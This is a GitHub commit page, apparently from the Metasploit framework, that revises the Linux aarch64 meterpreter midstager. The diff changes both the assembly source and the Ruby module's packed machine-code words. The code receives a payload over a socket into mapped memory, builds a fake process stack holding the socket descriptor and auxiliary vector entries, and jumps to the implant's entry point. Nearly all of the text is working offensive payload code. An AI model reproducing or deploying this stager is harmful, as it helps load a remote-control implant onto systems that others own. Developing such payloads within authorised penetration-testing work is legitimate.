Skip to content

Commit 26f4fa3

Browse files
timwrtimwr
committed
setup stack
1 parent a239699 commit 26f4fa3

File tree

2 files changed

+66
-90
lines changed

2 files changed

+66
-90
lines changed

external/source/shellcode/linux/aarch64/stage_mettle.s

Lines changed: 36 additions & 72 deletions
Original file line numberDiff line numberDiff line change
@@ -44,81 +44,48 @@ read_loop:
4444
subs x4, x4, x0
4545
bne read_loop
4646

47-
/* set up the initial stack */
48-
/*
47+
/* add entry_offset */
48+
adr x0, entry
49+
ldr x0, [x0]
50+
add x0, x0, x10
51+
mov x14, x0
4952

50-
add sp, sp, #80
51-
mov x4, #109
52-
eor x5, x5, x5
53+
/* set up the initial stack */
54+
mov x0, sp
55+
and sp, x0, #-16
56+
add sp, sp, #(16 * 6)
57+
58+
/* argc = 2, argv[0] = 'm' */
59+
mov x0, #2
60+
mov x1, #109
61+
str x1, [sp]
62+
mov x1, sp
63+
stp x0, x1, [sp, #-16]!
64+
65+
/* argc = 2, argv[1] = 'x12 (sockfd)' */
66+
mov x2, x12
67+
mov x3, 0
68+
stp x2, x3, [sp, #-16]!
69+
70+
mov x4, 0
71+
mov x5, #7 /* AT_BASE */
5372
stp x4, x5, [sp, #-16]!
5473

55-
mov x1,#2
56-
mov x2,sp
57-
mov x3,#0
58-
59-
mov x4,#2
60-
mov x5,sp
61-
mov x6,x12
62-
mov x7,#0
63-
mov x8,#0
64-
mov x9,#7
65-
mov x10,x10
66-
mov x11,#0
67-
mov x12,#0
68-
69-
eor x0, x0, x0
70-
eor x1, x1, x1
71-
eor x2, x2, x2
72-
eor x3, x3, x3
73-
stp x4, x5, [sp, #-16]!
74+
mov x6, x10
75+
mov x7, #6 /* AT_PAGESZ */
7476
stp x6, x7, [sp, #-16]!
75-
stp x7, x8, [sp, #-16]!
76-
stp x9, x10, [sp, #-16]!
77-
stp x11, x12, [sp, #-16]!
78-
*/
7977

80-
adr x0, entry
81-
ldr x0, [x0]
82-
// entry_offset + mmap
83-
add x0, x0, x10
78+
mov x8, #0x1000
79+
mov x9, #25 /* AT_RANDOM */
80+
stp x8, x9, [sp, #-16]!
81+
82+
mov x10, x10
83+
mov x11, #0 /* AT_NULL */
84+
stp x10, x11, [sp, #-16]!
8485

85-
mov x8, x0
86-
87-
88-
/* Set up the fake stack.
89-
For whatever reason, aarch64 binaries really want AT_RANDOM
90-
to be available. */
91-
/* AT_NULL */
92-
eor x0, x0, x0
93-
eor x1, x1, x1
94-
stp x0, x1, [sp, #-16]!
95-
/* AT_RANDOM */
96-
mov x2, #25
97-
mov x3, sp
98-
stp x2, x3, [sp, #-16]!
99-
100-
/* argc, argv[0], argv[1], envp */
101-
/* ideally these could all be empty, but unfortunately
102-
we have to keep the stack aligned. it's easier to
103-
just push an extra argument than care... */
104-
stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
105-
mov x0, 1
106-
mov x1, sp
107-
stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
108-
109-
br x8
110-
111-
/*
112-
mov x0, #109
113-
mov x1, x12
114-
stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
115-
/* mov x0, 2
116-
mov x1, sp
117-
stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
118-
119-
/*
120-
blr x8
121-
*/
86+
mov x29, #0
87+
mov x30, #0
88+
br x14
12289

12390
failed:
12491
mov x0, 0
@@ -132,6 +99,3 @@ size:
13299
entry:
133100
.word ENTRY
134101
.word 0
135-
m:
136-
.word 0x0000006d
137-
.word 0x00000000

modules/payloads/stages/linux/aarch64/meterpreter.rb

Lines changed: 30 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -41,8 +41,7 @@ def handle_intermediate_stage(conn, payload)
4141
midstager = [
4242

4343

44-
45-
0x10000582, # adr x2, b0 <size>
44+
0x10000782, # adr x2, f0 <size>
4645
0xb9400042, # ldr w2, [x2]
4746
0xaa0203ea, # mov x10, x2
4847
0xd34cfc42, # lsr x2, x2, #12
@@ -64,36 +63,49 @@ def handle_intermediate_stage(conn, payload)
6463
0xaa0403e2, # mov x2, x4
6564
0xd28007e8, # mov x8, #0x3f // #63
6665
0xd4000001, # svc #0x0
67-
0x34000260, # cbz w0, a4 <failed>
66+
0x34000440, # cbz w0, e0 <failed>
6867
0x8b000063, # add x3, x3, x0
6968
0xeb000084, # subs x4, x4, x0
7069
0x54ffff01, # b.ne 44 <read_loop>
71-
0x10000280, # adr x0, b8 <entry>
70+
0x10000480, # adr x0, f8 <entry>
7271
0xf9400000, # ldr x0, [x0]
7372
0x8b0a0000, # add x0, x0, x10
74-
0xaa0003e8, # mov x8, x0
75-
0xca000000, # eor x0, x0, x0
76-
0xca010021, # eor x1, x1, x1
77-
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
78-
0xd2800322, # mov x2, #0x19 // #25
79-
0x910003e3, # mov x3, sp
80-
0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
81-
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
82-
0xd2800020, # mov x0, #0x1 // #1
73+
0xaa0003ee, # mov x14, x0
74+
0x910003e0, # mov x0, sp
75+
0x927cec1f, # and sp, x0, #0xfffffffffffffff0
76+
0x910183ff, # add sp, sp, #0x60
77+
0xd2800040, # mov x0, #0x2 // #2
78+
0xd2800da1, # mov x1, #0x6d // #109
79+
0xf90003e1, # str x1, [sp]
8380
0x910003e1, # mov x1, sp
8481
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
85-
0xd61f0100, # br x8
82+
0xaa0c03e2, # mov x2, x12
83+
0xd2800003, # mov x3, #0x0 // #0
84+
0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
85+
0xd2800004, # mov x4, #0x0 // #0
86+
0xd28000e5, # mov x5, #0x7 // #7
87+
0xa9bf17e4, # stp x4, x5, [sp,#-16]!
88+
0xaa0a03e6, # mov x6, x10
89+
0xd28000c7, # mov x7, #0x6 // #6
90+
0xa9bf1fe6, # stp x6, x7, [sp,#-16]!
91+
0xd2820008, # mov x8, #0x1000 // #4096
92+
0xd2800329, # mov x9, #0x19 // #25
93+
0xa9bf27e8, # stp x8, x9, [sp,#-16]!
94+
0xaa0a03ea, # mov x10, x10
95+
0xd280000b, # mov x11, #0x0 // #0
96+
0xa9bf2fea, # stp x10, x11, [sp,#-16]!
97+
0xd280001d, # mov x29, #0x0 // #0
98+
0xd280001e, # mov x30, #0x0 // #0
99+
0xd61f01c0, # br x14
86100
0xd2800000, # mov x0, #0x0 // #0
87101
0xd2800ba8, # mov x8, #0x5d // #93
88102
0xd4000001, # svc #0x0
103+
0xd503201f, # nop
104+
89105
payload.length,
90106
0x00000000, # .word 0x00000000
91107
entry_offset,
92108
0x00000000, # .word 0x00000000
93-
0x0000006d, # .word 0x0000006d
94-
0x00000000, # .word 0x00000000
95-
0xd503201f, # nop
96-
0xd503201f, # nop
97109
].pack('V*')
98110

99111
print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")

0 commit comments

Comments
 (0)